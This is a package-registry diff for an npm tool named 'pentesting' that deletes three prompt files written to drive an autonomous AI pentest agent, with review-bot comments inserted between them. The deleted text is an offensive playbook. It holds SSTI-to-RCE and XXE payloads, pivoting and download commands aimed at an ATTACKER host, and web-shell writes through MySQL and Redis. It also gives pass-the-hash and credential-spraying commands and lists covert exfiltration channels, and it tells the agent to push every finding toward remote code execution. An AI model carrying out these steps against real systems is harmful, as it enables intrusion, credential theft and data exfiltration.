pentesting 0.73.13 → 0.90.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (70)
  1. package/README.md +120 -44
  2. package/bin/pentesting.mjs +32 -0
  3. package/lib/runtime.mjs +419 -0
  4. package/package.json +17 -46
  5. package/scripts/postinstall.mjs +30 -0
  6. package/scripts/preflight-local.sh +24 -0
  7. package/dist/ad/prompt.md +0 -60
  8. package/dist/agent-tool-KHXXTHGS.js +0 -989
  9. package/dist/api/prompt.md +0 -63
  10. package/dist/chunk-4UNNRHYY.js +0 -5797
  11. package/dist/chunk-GILD75OT.js +0 -11407
  12. package/dist/chunk-S5ZMXFHR.js +0 -1162
  13. package/dist/cloud/prompt.md +0 -49
  14. package/dist/container/prompt.md +0 -58
  15. package/dist/database/prompt.md +0 -58
  16. package/dist/email/prompt.md +0 -44
  17. package/dist/file-sharing/prompt.md +0 -56
  18. package/dist/ics/prompt.md +0 -76
  19. package/dist/main.d.ts +0 -1
  20. package/dist/main.js +0 -9777
  21. package/dist/network/prompt.md +0 -49
  22. package/dist/persistence-U2N3KWFH.js +0 -13
  23. package/dist/process-registry-4Y3HB4YQ.js +0 -30
  24. package/dist/prompts/base.md +0 -436
  25. package/dist/prompts/ctf-crypto.md +0 -168
  26. package/dist/prompts/ctf-forensics.md +0 -182
  27. package/dist/prompts/ctf-pwn.md +0 -137
  28. package/dist/prompts/evasion.md +0 -215
  29. package/dist/prompts/exploit.md +0 -416
  30. package/dist/prompts/infra.md +0 -114
  31. package/dist/prompts/llm/analyst-system.md +0 -76
  32. package/dist/prompts/llm/context-extractor-system.md +0 -19
  33. package/dist/prompts/llm/input-processor-system.md +0 -64
  34. package/dist/prompts/llm/memory-synth-system.md +0 -14
  35. package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
  36. package/dist/prompts/llm/reflector-system.md +0 -16
  37. package/dist/prompts/llm/report-generator-system.md +0 -21
  38. package/dist/prompts/llm/strategist-fallback.md +0 -9
  39. package/dist/prompts/llm/triage-system.md +0 -47
  40. package/dist/prompts/main-agent.md +0 -193
  41. package/dist/prompts/offensive-playbook.md +0 -250
  42. package/dist/prompts/payload-craft.md +0 -181
  43. package/dist/prompts/post.md +0 -185
  44. package/dist/prompts/recon.md +0 -296
  45. package/dist/prompts/report.md +0 -98
  46. package/dist/prompts/strategist-system.md +0 -472
  47. package/dist/prompts/strategy.md +0 -163
  48. package/dist/prompts/techniques/README.md +0 -40
  49. package/dist/prompts/techniques/ad-attack.md +0 -261
  50. package/dist/prompts/techniques/auth-access.md +0 -256
  51. package/dist/prompts/techniques/container-escape.md +0 -103
  52. package/dist/prompts/techniques/crypto.md +0 -296
  53. package/dist/prompts/techniques/enterprise-pentest.md +0 -175
  54. package/dist/prompts/techniques/file-attacks.md +0 -144
  55. package/dist/prompts/techniques/forensics.md +0 -313
  56. package/dist/prompts/techniques/injection.md +0 -217
  57. package/dist/prompts/techniques/lateral.md +0 -128
  58. package/dist/prompts/techniques/network-svc.md +0 -229
  59. package/dist/prompts/techniques/pivoting.md +0 -205
  60. package/dist/prompts/techniques/privesc.md +0 -190
  61. package/dist/prompts/techniques/pwn.md +0 -595
  62. package/dist/prompts/techniques/reversing.md +0 -183
  63. package/dist/prompts/techniques/sandbox-escape.md +0 -73
  64. package/dist/prompts/techniques/shells.md +0 -194
  65. package/dist/prompts/vuln.md +0 -190
  66. package/dist/prompts/web.md +0 -318
  67. package/dist/prompts/zero-day.md +0 -298
  68. package/dist/remote-access/prompt.md +0 -52
  69. package/dist/web/prompt.md +0 -59
  70. package/dist/wireless/prompt.md +0 -62
@@ -1,217 +0,0 @@
1
- # Injection Attacks — Comprehensive Autonomous Guide
2
-
3
- > **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
4
- > Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
5
- > to decide what to test and in what order. Adapt dynamically — not to this list.
6
-
7
- > **Cross-ref**: web.md (web testing), evasion.md (bypass), payload-craft.md (mutation)
8
-
9
- ## Core Principle
10
- Every input is a potential injection point. There are 20+ injection TYPES,
11
- each with hundreds of variants. **You cannot memorize them all — SEARCH for each.**
12
-
13
- ## Injection Type Map (Know ALL Categories)
14
-
15
- ```
16
- INJECTION TYPES — Complete Category Awareness:
17
-
18
- ├── 1. SQL Injection (SQLi)
19
- │ ├── In-band: UNION-based, Error-based
20
- │ ├── Blind: Boolean-based, Time-based
21
- │ ├── Out-of-band: DNS/HTTP exfiltration
22
- │ ├── Second-order: stored then triggered
23
- │ ├── Stacked queries: multiple statements
24
- │ └── DB-specific: MySQL, PostgreSQL, MSSQL, Oracle, SQLite (each has unique syntax)
25
-
26
- ├── 2. Command Injection (CMDi / OS Injection)
27
- │ ├── Direct: ; | & && || ` $()
28
- │ ├── Blind: timing-based (sleep/ping), out-of-band (DNS/HTTP callback)
29
- │ ├── Argument injection: --option=malicious
30
- │ └── Environment variable injection
31
-
32
- ├── 3. Server-Side Template Injection (SSTI)
33
- │ ├── Jinja2 (Python): {{7*7}}, {{config}}, {{''.__class__.__mro__[2].__subclasses__()}}
34
- │ ├── Twig (PHP): {{7*7}}, {{_self.env.registerUndefinedFilterCallback("exec")}}
35
- │ ├── Freemarker (Java): ${7*7}, <#assign ex="freemarker.template.utility.Execute"?new()>
36
- │ ├── ERB (Ruby): <%=7*7%>, <%=system('id')%>
37
- │ ├── Pug/Jade (Node): #{7*7}
38
- │ ├── Velocity (Java): #set($x=7*7)$x
39
- │ └── DETECTION: Send polyglot → {{7*7}}${7*7}<%=7*7%>${{7*7}} → see what evaluates
40
-
41
- ├── 4. Cross-Site Scripting (XSS)
42
- │ ├── Reflected, Stored, DOM-based, Blind
43
- │ ├── Context: HTML body, attribute, JavaScript, URL, CSS, SVG, MathML
44
- │ ├── Payloads: <script>, <img onerror>, <svg onload>, event handlers, javascript: URI
45
- │ └── Impact: session theft, keylogging, phishing, crypto mining, worm
46
-
47
- ├── 5. XML External Entity (XXE)
48
- │ ├── Classic: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
49
- │ ├── Blind: out-of-band via DTD + HTTP/DNS callback
50
- │ ├── Error-based: trigger error containing file content
51
- │ ├── Through: SOAP, SVG upload, DOCX/XLSX, RSS feeds, SAML
52
- │ └── Variants: XInclude, XSLT injection
53
-
54
- ├── 6. LDAP Injection
55
- │ ├── Authentication bypass: *)(&
56
- │ ├── Data extraction: )(cn=*)
57
- │ └── Blind: timing/error differences
58
-
59
- ├── 7. NoSQL Injection
60
- │ ├── MongoDB: {"$gt":""}, {"$ne":""}, {"$regex":".*"}
61
- │ ├── Authentication bypass: {"username":{"$ne":""},"password":{"$ne":""}}
62
- │ └── Operator injection: $where, $regex, $gt, $ne
63
-
64
- ├── 8. XPath Injection
65
- │ ├── Similar to SQLi but for XML: ' or '1'='1
66
- │ └── Blind: boolean/timing based
67
-
68
- ├── 9. CRLF Injection
69
- │ ├── Header injection: %0d%0a
70
- │ ├── Can lead to: HTTP response splitting, XSS, cache poisoning
71
- │ └── Log injection: inject fake log entries
72
-
73
- ├── 10. Header Injection
74
- │ ├── Host header: password reset poisoning, routing bypass
75
- │ ├── X-Forwarded-For: IP-based access control bypass
76
- │ ├── X-Original-URL / X-Rewrite-URL: path-based access control bypass
77
- │ └── Referer: SSRF via referer processing
78
-
79
- ├── 11. SSTI → RCE Chains (template-specific)
80
- │ └── web_search("{template_engine} SSTI to RCE payload")
81
-
82
- ├── 12. Expression Language Injection (EL Injection)
83
- │ ├── Java EE: ${7*7}, #{7*7}
84
- │ └── Spring: *{7*7}
85
-
86
- ├── 13. Code Injection
87
- │ ├── PHP: eval(), assert(), preg_replace with /e
88
- │ ├── Python: eval(), exec(), input() (Python 2)
89
- │ ├── Ruby: eval(), system()
90
- │ └── Node: eval(), Function()
91
-
92
- ├── 14. CSV Injection (Formula Injection)
93
- │ ├── =cmd|'/C calc'!A0 (Excel)
94
- │ └── Through exported CSV/XLSX files
95
-
96
- ├── 15. Email Header Injection
97
- │ ├── %0aCc: attacker@evil.com
98
- │ └── Add arbitrary recipients, modify headers
99
-
100
- ├── 16. HTTP Parameter Pollution (HPP)
101
- │ ├── ?param=good&param=evil (server picks which?)
102
- │ └── Bypass WAF by splitting payload across same-name params
103
-
104
- ├── 17. Prototype Pollution (JavaScript)
105
- │ ├── __proto__[isAdmin]=true
106
- │ ├── constructor.prototype.isAdmin=true
107
- │ └── Can lead to: RCE, auth bypass, DoS
108
-
109
- ├── 18. Insecure Deserialization
110
- │ ├── Java: ObjectInputStream → gadget chains (ysoserial)
111
- │ ├── PHP: unserialize() → POP chains (phpggc)
112
- │ ├── Python: pickle.loads() → __reduce__ → RCE
113
- │ ├── .NET: BinaryFormatter, JSON.NET TypeNameHandling
114
- │ ├── Ruby: Marshal.load()
115
- │ └── Node: node-serialize
116
-
117
- ├── 19. GraphQL Injection
118
- │ ├── Introspection: {__schema{types{name,fields{name}}}}
119
- │ ├── Batching for brute force bypass
120
- │ ├── Nested queries for DoS
121
- │ └── Mutation discovery → unauthorized operations
122
-
123
- └── 20. WebSocket Injection
124
- ├── Same injection types apply through WebSocket messages
125
- └── Often LESS filtered than HTTP requests
126
- ```
127
-
128
- ## 🧠 Injection Discovery — Autonomous Decision Tree
129
-
130
- ```
131
- FOR EVERY input point discovered:
132
-
133
- 1. IDENTIFY context: Where does this input go?
134
- ├── Database query → SQLi/NoSQLi
135
- ├── System command → CMDi
136
- ├── Template render → SSTI
137
- ├── XML parser → XXE
138
- ├── File path → LFI/RFI (see file-attacks.md)
139
- ├── HTTP header → Header injection / CRLF
140
- ├── LDAP query → LDAPi
141
- ├── HTML output → XSS
142
- ├── Deserialization → Insecure deserialization
143
- └── Unknown → try ALL categories with detection probes
144
-
145
- 2. DETECTION PROBES (send these to identify vulnerability type):
146
- ├── ' " ; — → SQL errors?
147
- ├── {{7*7}} ${7*7} → Template evaluation?
148
- ├── ;id ;whoami |id → Command output?
149
- ├── <script>alert(1)</script> → XSS rendering?
150
- ├── <!--#exec cmd="id"--> → SSI?
151
- ├── %0d%0aHeader:injected → CRLF?
152
- └── ANY behavioral difference (error, timing, output) = signal
153
-
154
- 3. CONFIRM → find the exact injection type and context
155
- 4. EXPLOIT → web_search("{injection_type} exploitation payloads hacktricks")
156
- 5. BLOCKED? → payload_mutate + evasion.md → try encoded variants
157
- 6. CHAIN → injection → RCE → shell → privesc (see shells.md, privesc.md)
158
- ```
159
-
160
- ## Injection Search Patterns
161
-
162
- ```
163
- For EVERY injection type discovered:
164
-
165
- web_search("{injection_type} exploit payloads hacktricks")
166
- web_search("{injection_type} {database/language} cheatsheet")
167
- web_search("{injection_type} bypass WAF filter")
168
- web_search("{injection_type} blind extraction techniques")
169
- web_search("{injection_type} to RCE")
170
- web_search("PayloadsAllTheThings {injection_type}")
171
-
172
- Automated tools (where applicable):
173
- ├── SQLi: sqlmap -u URL --forms --batch --level=5 --risk=3
174
- ├── XSS: dalfox url URL
175
- ├── SSTI: tplmap -u URL
176
- ├── CMDi: commix --url=URL
177
- ├── XXE: xxeinjector
178
- └── General: nuclei -u URL -as
179
- ```
180
-
181
- ## Injection → RCE Chains
182
- ```
183
- Goal: Every injection should eventually lead to RCE if possible.
184
-
185
- SQLi → RCE:
186
- ├── MySQL: INTO OUTFILE webshell, UDF, sys_exec
187
- ├── PostgreSQL: COPY TO file, lo_export, pg_read_file
188
- ├── MSSQL: xp_cmdshell, sp_OACreate
189
- ├── Oracle: DBMS_SCHEDULER, Java stored procedures
190
- └── SQLite: load_extension()
191
-
192
- SSTI → RCE:
193
- ├── Jinja2: {{config.__class__.__init__.__globals__['os'].popen('id').read()}}
194
- ├── Twig: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
195
- ├── Each engine has different paths → SEARCH for specific engine
196
- └── web_search("{engine} SSTI RCE payload")
197
-
198
- XXE → impact:
199
- ├── File read → credentials → further access
200
- ├── SSRF → internal service access
201
- ├── RCE (rare): expect:// wrapper (PHP), xslt:// extensions
202
- └── Blind → out-of-band data exfiltration
203
-
204
- XSS → impact:
205
- ├── Session theft → admin access
206
- ├── Blind XSS → admin panel compromise
207
- ├── DOM manipulation → credential theft
208
- ├── Worm → self-spreading XSS
209
- └── Keylogging → capture all input
210
-
211
- Deserialization → RCE:
212
- ├── Java: ysoserial → choose correct gadget chain for target libraries
213
- ├── PHP: phpggc → choose correct POP chain
214
- ├── Python: pickle → __reduce__ method
215
- ├── .NET: ysoserial.net
216
- └── ALWAYS: web_search("{framework} deserialization gadget chain RCE")
217
- ```
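Review bot: this hunk removes package/dist/prompts/techniques/injection.md outright (`@@ -1,217 +0,0 @@`) and nothing in the changed-files list adds a replacement: every entry under package/dist/ is a deletion, while the only additions are package/bin/pentesting.mjs (+32), package/lib/runtime.mjs (+419), package/scripts/postinstall.mjs (+30) and package/scripts/preflight-local.sh (+24). A package that goes from a bundled 9,777-line dist/main.js to a small launcher plus a postinstall script needs the README diff (package/README.md +120 -44) to state where the technique prompts now come from and whether they are still pinned to the published version; if they are fetched or generated at install or run time, say so explicitly, because someone auditing 0.90.1 can no longer read the agent's instructions from the tarball. If the file is being re-homed rather than dropped, also fix the Jinja2 line `{{''.__class__.__mro__[2].__subclasses__()}}`: on Python 3 `str.__mro__` is `(str, object)`, so index 2 raises IndexError and the working form is `__mro__[1]`.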
@@ -1,128 +0,0 @@
1
- # Lateral Movement & Pivoting — Comprehensive Autonomous Guide
2
-
3
- > **Cross-ref**: shells.md (shell access), ad-attack.md (AD movement), privesc.md (escalation)
4
-
5
- ## Core Principle
6
- Initial access is one machine. Lateral movement = entire network.
7
- Every credential, hash, token, and key is a potential pivot point.
8
-
9
- ## Lateral Movement Techniques
10
-
11
- ```
12
- LATERAL MOVEMENT MAP:
13
-
14
- ├── 1. Credential-Based Movement
15
- │ ├── SSH with credentials: ssh user@TARGET
16
- │ ├── SSH with key: ssh -i stolen_id_rsa user@TARGET
17
- │ ├── RDP: xfreerdp /v:TARGET /u:user /p:pass /cert:ignore
18
- │ ├── WinRM: evil-winrm -i TARGET -u user -p pass
19
- │ ├── PsExec: impacket-psexec user:pass@TARGET
20
- │ ├── WMI: impacket-wmiexec user:pass@TARGET
21
- │ ├── SMBExec: impacket-smbexec user:pass@TARGET
22
- │ ├── DCOM: impacket-dcomexec user:pass@TARGET
23
- │ ├── Pass-the-Hash: impacket-psexec -hashes :NTLM_HASH user@TARGET
24
- │ ├── Pass-the-Ticket: export KRB5CCNAME=ticket.ccache → impacket tools -k
25
- │ └── Credential spraying: try EVERY found credential on EVERY accessible service
26
-
27
- ├── 2. Network Pivoting (Access Hidden Networks)
28
- │ ├── SSH tunneling:
29
- │ │ ├── Local: ssh -L LOCAL_PORT:INTERNAL_HOST:INTERNAL_PORT user@PIVOT
30
- │ │ ├── Dynamic SOCKS: ssh -D 9050 user@PIVOT → proxychains
31
- │ │ ├── Remote: ssh -R ATTACKER_PORT:INTERNAL_HOST:PORT user@ATTACKER
32
- │ │ └── ProxyJump: ssh -J user@PIVOT user@INTERNAL
33
- │ │
34
- │ ├── Chisel (recommended for non-SSH):
35
- │ │ ├── Server (attacker): chisel server -p 8080 --reverse
36
- │ │ ├── Client (pivot): chisel client ATTACKER:8080 R:socks
37
- │ │ └── Then: proxychains nmap -Pn INTERNAL_SUBNET
38
- │ │
39
- │ ├── Ligolo-ng (easiest for complex pivoting):
40
- │ │ ├── Proxy (attacker): ligolo-proxy -selfcert -laddr 0.0.0.0:PORT
41
- │ │ ├── Agent (pivot): ligolo-agent -connect ATTACKER:PORT -ignore-cert
42
- │ │ └── Add routes to internal networks from attacker
43
- │ │
44
- │ ├── socat:
45
- │ │ ├── Port forwarding: socat TCP-LISTEN:LOCAL,fork TCP:INTERNAL:PORT
46
- │ │ └── Useful on systems without SSH
47
- │ │
48
- │ ├── sshuttle: sshuttle -r user@PIVOT INTERNAL_SUBNET/24
49
- │ │ └── Transparent proxy — no need for proxychains
50
- │ │
51
- │ ├── Metasploit: route add SUBNET MASK SESSION
52
- │ │ └── autoroute + socks_proxy modules
53
- │ │
54
- │ ├── Windows-specific:
55
- │ │ ├── netsh portproxy: netsh interface portproxy add v4tov4 listenport=P connectaddress=HOST connectport=P
56
- │ │ ├── plink.exe: plink -ssh -L LOCAL:INTERNAL:PORT user@PIVOT
57
- │ │ └── web_search("windows port forwarding pivoting techniques")
58
- │ │
59
- │ └── web_search("pivoting tunneling techniques {tool} hacktricks")
60
-
61
- ├── 3. File Transfer (Getting Tools Where They Need to Go)
62
- │ ├── Linux upload to target:
63
- │ │ ├── wget/curl: wget http://ATTACKER:PORT/file -O /tmp/file
64
- │ │ ├── Python HTTP server: python3 -m http.server PORT (on attacker)
65
- │ │ ├── scp: scp file user@TARGET:/tmp/
66
- │ │ ├── Netcat: nc -lvnp PORT > file (recv) | nc TARGET PORT < file (send)
67
- │ │ ├── Base64: base64 file → echo 'B64' | base64 -d > file
68
- │ │ └── /dev/tcp: cat < /dev/tcp/ATTACKER/PORT > file
69
- │ │
70
- │ ├── Windows upload to target:
71
- │ │ ├── certutil: certutil -urlcache -split -f http://ATTACKER/file file
72
- │ │ ├── PowerShell: IWR -Uri http://ATTACKER/file -OutFile file
73
- │ │ ├── bitsadmin: bitsadmin /transfer job /download /priority high URL file
74
- │ │ ├── SMB: copy \\ATTACKER\share\file . (start smbserver on attacker)
75
- │ │ └── In-memory: IEX(New-Object Net.WebClient).DownloadString('http://ATK/ps1')
76
- │ │
77
- │ └── web_search("file transfer techniques {OS} hacktricks")
78
-
79
- ├── 4. Internal Network Discovery
80
- │ ├── From compromised host:
81
- │ │ ├── ip a, ifconfig, ipconfig /all → network interfaces
82
- │ │ ├── ip route, route -n, route print → routing tables
83
- │ │ ├── arp -a → known hosts in local network
84
- │ │ ├── cat /etc/hosts, type C:\Windows\System32\drivers\etc\hosts
85
- │ │ ├── netstat -antp → active connections → more targets
86
- │ │ ├── Internal port scan: for i in $(seq 1 254); do ping -c1 -W1 10.0.0.$i; done
87
- │ │ └── proxychains nmap -sT -Pn -p- INTERNAL_SUBNET (through pivot)
88
- │ │
89
- │ └── EVERY new network found = FULL reconnaissance cycle (rerun everything)
90
-
91
- ├── 5. Credential Reuse Strategy
92
- │ ├── Every found credential → test on ALL reachable services:
93
- │ │ ├── SSH, RDP, WinRM, SMB, FTP, databases, web logins, VPN
94
- │ │ ├── crackmapexec smb SUBNET/24 -u user -p pass → mass test
95
- │ │ ├── Same password with different usernames
96
- │ │ ├── Same username with slight password variations
97
- │ │ └── Hash-based: Pass-the-Hash to all Windows targets
98
- │ │
99
- │ └── Credential chain: creds from host A → access host B → creds from B → access C
100
-
101
- └── 6. Covert Channels
102
- ├── DNS tunneling: iodine, dnscat2 → bypass network restrictions
103
- ├── ICMP tunneling: icmpsh, ptunnel
104
- ├── HTTP tunneling: through web proxies
105
- ├── WebSocket tunneling: through WAF
106
- └── web_search("covert channel exfiltration tunneling {protocol}")
107
- ```
108
-
109
- ## Pivoting Workflow
110
- ```
111
- Got access to new host?
112
- 1. STABILIZE: upgrade shell, set up persistence (shells.md)
113
- 2. ENUMERATE: network interfaces, routes, ARP, connections, hosts file
114
- 3. LOOT: credentials, keys, tokens, hashes, config files
115
- 4. PIVOT: set up tunnel/proxy to newly discovered networks
116
- 5. SCAN: recon the new network through the pivot
117
- 6. SPRAY: test found credentials on all new services
118
- 7. REPEAT: for each new host compromised
119
- ```
120
-
121
- ## Search Patterns
122
- ```
123
- web_search("pivoting techniques {tool_name} hacktricks")
124
- web_search("file transfer {OS} one-liner techniques")
125
- web_search("{protocol} tunneling tool pivot")
126
- web_search("proxychains {tool} through pivot")
127
- web_search("lateral movement {technique} detection evasion")
128
- ```
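Review bot: lateral.md is removed as a plain deletion (`@@ -1,128 +0,0 @@`) with no rename or move shown, and the diff does not say whether the content was dropped or only moved outside the published file set; package/package.json changes +17 -46 in the same release, so check whether a narrowed `files` field or a changed build step is what took these files out of the tarball, and record the answer in the changelog. The commands in the removed file (`chisel client ATTACKER:8080 R:socks`, `ligolo-agent -connect ATTACKER:PORT -ignore-cert`, `crackmapexec smb SUBNET/24 -u user -p pass`, the certutil and bitsadmin download one-liners) are exactly what a defender would grep for when this tool shows up in an environment, so removing them from the shipped artifact is a change worth flagging on its own, not just a cleanup.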
@@ -1,229 +0,0 @@
1
- # Network Service Attacks — Comprehensive Autonomous Guide
2
-
3
- > **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
4
- > Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
5
- > to decide what to test and in what order. Adapt dynamically — not to this list.
6
-
7
- > **Cross-ref**: recon.md (discovery), exploit.md (exploitation), shells.md (getting shell)
8
-
9
- ## Core Principle
10
- Every open port is an attack surface. Every service has known and unknown vulnerabilities.
11
- **ALWAYS: service detection → version → IMMEDIATE web_search for exploits.**
12
-
13
- ## Service Attack Decision Engine
14
-
15
- ```
16
- FOR EVERY OPEN PORT DISCOVERED:
17
-
18
- ├── 1. IDENTIFY: nmap -Pn -sV -sC -p PORT TARGET → exact version
19
- ├── 2. SEARCH: web_search("{service} {version} exploit CVE hacktricks")
20
- ├── 3. CHECK: searchsploit {service} {version}
21
- ├── 4. READ: browse_url(hacktricks_result) → learn attack methodology
22
- ├── 5. ATTACK: apply known techniques + search for bypasses
23
- ├── 6. BLOCKED: evasion.md + payload_mutate → try encoded/alternative
24
- └── 7. CHAIN: combine with other findings (see strategy.md)
25
- ```
26
-
27
- ## 🌐 Web Services (80, 443, 8080, 8443)
28
-
29
- ```
30
- Web Server Identified → FULL WEB PIPELINE:
31
- ├── Technology: whatweb, wappalyzer, curl headers
32
- ├── CMS detection → CMS-specific scanner:
33
- │ WordPress → wpscan --enumerate vp,vt,u --plugins-detection aggressive
34
- │ Drupal → droopescan scan drupal -u URL
35
- │ Joomla → joomscan -u URL
36
- │ web_search("{CMS} {version} exploit CVE")
37
-
38
- ├── Content discovery (MANDATORY):
39
- │ ├── ffuf -u URL/FUZZ -w /usr/share/wordlists/dirb/big.txt -fc 404
40
- │ ├── feroxbuster -u URL --smart --auto-tune
41
- │ ├── gobuster dir -u URL -w wordlist -x php,asp,aspx,jsp,html,js,txt,bak
42
- │ ├── Try backup extensions: .bak, .old, .orig, .save, .swp, ~, .tmp
43
- │ └── Add technology-specific extensions to wordlist
44
-
45
- ├── Sensitive file check:
46
- │ .env, .git/HEAD, .DS_Store, .htaccess, web.config,
47
- │ robots.txt, sitemap.xml, crossdomain.xml, clientaccesspolicy.xml,
48
- │ phpinfo.php, server-status, server-info, info.php, test.php
49
-
50
- ├── API discovery:
51
- │ /api, /api/v1, /swagger, /swagger-ui, /openapi.json,
52
- │ /graphql, /graphiql, /api-docs, /.well-known/
53
-
54
- ├── Virtual hosts: ffuf -H "Host: FUZZ.TARGET" -u http://IP -w subdomains.txt
55
-
56
- └── Deep web testing → see injection.md, auth-access.md, file-attacks.md
57
- ```
58
-
59
- ## 🔐 Authentication Services
60
-
61
- ```
62
- SSH (22):
63
- ├── Version CVE: web_search("OpenSSH {version} CVE exploit")
64
- ├── Username enumeration: web_search("openssh {version} user enumeration CVE")
65
- ├── Brute force: hydra -l root -P wordlist ssh://TARGET
66
- ├── Key-based: try found keys from other hosts
67
- ├── Agent forwarding: if forwarded → hijack to access other hosts
68
- └── Misconfig: check for weak algorithms, passwordless login
69
-
70
- FTP (21):
71
- ├── Anonymous: ftp TARGET → anonymous / (empty password)
72
- ├── Version CVE: web_search("{ftpd} {version} exploit")
73
- ├── Brute force: hydra -l admin -P wordlist ftp://TARGET
74
- ├── Writable dirs: if serves web → upload web shell
75
- ├── Bounce attack: use FTP to scan internal ports
76
- └── PASV mode: reveals internal IP addresses
77
-
78
- Telnet (23):
79
- ├── Often unencrypted → capture credentials
80
- ├── Default creds: web_search("{device} telnet default credentials")
81
- └── Version exploits: web_search("telnet {version} CVE")
82
-
83
- RDP (3389):
84
- ├── BlueKeep: nmap -Pn --script rdp-vuln-ms12-020 -p 3389 TARGET
85
- ├── Brute force: hydra -l admin -P wordlist rdp://TARGET
86
- ├── NLA bypass: web_search("RDP NLA bypass technique")
87
- ├── Credentials: try EVERY found credential
88
- └── Pass-the-Hash: xfreerdp /v:TARGET /u:admin /pth:NTLM -sec-nla
89
-
90
- VNC (5900-5910):
91
- ├── No auth: vncviewer TARGET::5900
92
- ├── Brute force: hydra -P wordlist -s 5900 TARGET vnc
93
- ├── VNC authentication bypass: web_search("VNC auth bypass")
94
- └── Decrypt stored password: web_search("vnc password decrypt")
95
-
96
- WinRM (5985/5986):
97
- ├── evil-winrm -i TARGET -u user -p pass
98
- ├── Pass-the-Hash: evil-winrm -i TARGET -u user -H NTLM_HASH
99
- └── If valid creds → full PowerShell access
100
- ```
101
-
102
- ## 📂 File Sharing Services
103
-
104
- ```
105
- SMB (139/445):
106
- ├── Null session: smbclient -L //TARGET -N, smbmap -H TARGET -u '' -p ''
107
- ├── Guest: smbmap -H TARGET -u 'guest' -p ''
108
- ├── Enumerate shares: crackmapexec smb TARGET --shares -u '' -p ''
109
- ├── Download everything: smbget -R smb://TARGET/share
110
- ├── Writable share: upload payload (web shell if web-accessible, batch/exe if executed)
111
- ├── Vulnerabilities:
112
- │ ├── EternalBlue (MS17-010): nmap -Pn --script smb-vuln-ms17-010
113
- │ ├── PrintNightmare: web_search("printnightmare exploit")
114
- │ ├── SMB relay: Responder + ntlmrelayx
115
- │ └── web_search("SMB {version} CVE exploit")
116
- ├── Password spray: crackmapexec smb TARGET -u users.txt -p passwords.txt
117
- └── Enum: crackmapexec smb TARGET -u user -p pass --users --groups --loggedon-users
118
-
119
- NFS (2049):
120
- ├── Show exports: showmount -e TARGET
121
- ├── Mount: mount -t nfs TARGET:/share /mnt/nfs
122
- ├── Check no_root_squash → create SUID binary on share → execute on target
123
- └── web_search("NFS exploitation no_root_squash")
124
-
125
- Rsync (873):
126
- ├── List modules: rsync -av --list-only rsync://TARGET/
127
- ├── Download: rsync -av rsync://TARGET/share/ ./loot/
128
- └── If writable: upload malicious crontab/authorized_keys
129
- ```
130
-
131
- ## Database Services
132
-
133
- ```
134
- MySQL (3306):
135
- ├── mysql -h TARGET -u root (no password)
136
- ├── mysql -h TARGET -u root -p'root' (common passwords)
137
- ├── Brute force: hydra -l root -P wordlist mysql://TARGET
138
- ├── UDF: web_search("mysql UDF privilege escalation")
139
- ├── INTO OUTFILE: SELECT '<?php system($_GET["cmd"]);?>' INTO OUTFILE '/var/www/html/cmd.php'
140
- ├── LOAD_FILE: SELECT LOAD_FILE('/etc/passwd')
141
- └── web_search("mysql {version} CVE exploit")
142
-
143
- PostgreSQL (5432):
144
- ├── psql -h TARGET -U postgres (often trust/peer auth)
145
- ├── COPY TO: COPY (SELECT 'shell') TO '/tmp/shell.sh'
146
- ├── pg_read_file: SELECT pg_read_file('/etc/passwd')
147
- ├── Large objects: read/write arbitrary files
148
- ├── Extension: CREATE EXTENSION dblink → SSRF
149
- └── web_search("postgresql {version} RCE exploit")
150
-
151
- MSSQL (1433):
152
- ├── impacket-mssqlclient DOMAIN/user:pass@TARGET
153
- ├── xp_cmdshell: EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami'
154
- ├── UNC path: EXEC xp_dirtree '\\ATTACKER\share' → capture NTLMv2
155
- ├── OLE automation: sp_OACreate for command execution
156
- ├── CLR assembly: custom .NET DLL → load and execute
157
- └── web_search("MSSQL exploitation techniques {year}")
158
-
159
- Redis (6379):
160
- ├── redis-cli -h TARGET (check no-auth)
161
- ├── INFO → version, OS, memory
162
- ├── Web shell: CONFIG SET dir /var/www/html; CONFIG SET dbfilename shell.php; SET x "<?php system($_GET['cmd']);?>"; SAVE
163
- ├── SSH key: CONFIG SET dir /root/.ssh; CONFIG SET dbfilename authorized_keys; SET x "KEY_DATA"; SAVE
164
- ├── Cron: CONFIG SET dir /var/spool/cron/crontabs; SET x "reverse_shell_cron"; SAVE
165
- ├── Master-slave RCE: MODULE LOAD via replication
166
- └── web_search("redis {version} RCE exploit")
167
-
168
- MongoDB (27017):
169
- ├── mongosh mongodb://TARGET:27017 (no auth)
170
- ├── db.adminCommand({listDatabases:1})
171
- ├── Dump all: for each db → show collections → db.collection.find()
172
- ├── Authentication bypass: web_search("mongodb auth bypass")
173
- └── web_search("mongodb {version} CVE")
174
-
175
- Elasticsearch (9200):
176
- ├── curl http://TARGET:9200/ → version info
177
- ├── curl http://TARGET:9200/_cat/indices → list all indices
178
- ├── curl http://TARGET:9200/_search?q=password → search for secrets
179
- ├── RCE: web_search("elasticsearch {version} RCE CVE")
180
- └── Snapshot API → read filesystem
181
- ```
182
-
183
- ## 📧 Other Common Services
184
-
185
- ```
186
- SMTP (25/587):
187
- ├── User enum: VRFY/EXPN/RCPT TO
188
- ├── Open relay: send from any address
189
- ├── web_search("smtp user enumeration techniques")
190
-
191
- DNS (53):
192
- ├── Zone transfer: dig axfr @TARGET domain.com
193
- ├── Subdomain brute: fierce, dnsrecon, ffuf
194
- ├── DNS cache snooping: information about internal infrastructure
195
- └── web_search("DNS exploitation techniques")
196
-
197
- SNMP (161/162):
198
- ├── snmpwalk -v2c -c public TARGET
199
- ├── Community brute: onesixtyone -c community.txt TARGET
200
- ├── Writable OIDs → RCE: web_search("SNMP RCE write community")
201
- └── Version 3: credential brute force
202
-
203
- LDAP (389/636):
204
- ├── Anonymous bind: ldapsearch -x -H ldap://TARGET -s base
205
- ├── User/group enumeration
206
- ├── LDAP injection: see injection.md
207
- └── Detailed methodology: web_search("LDAP pentesting hacktricks")
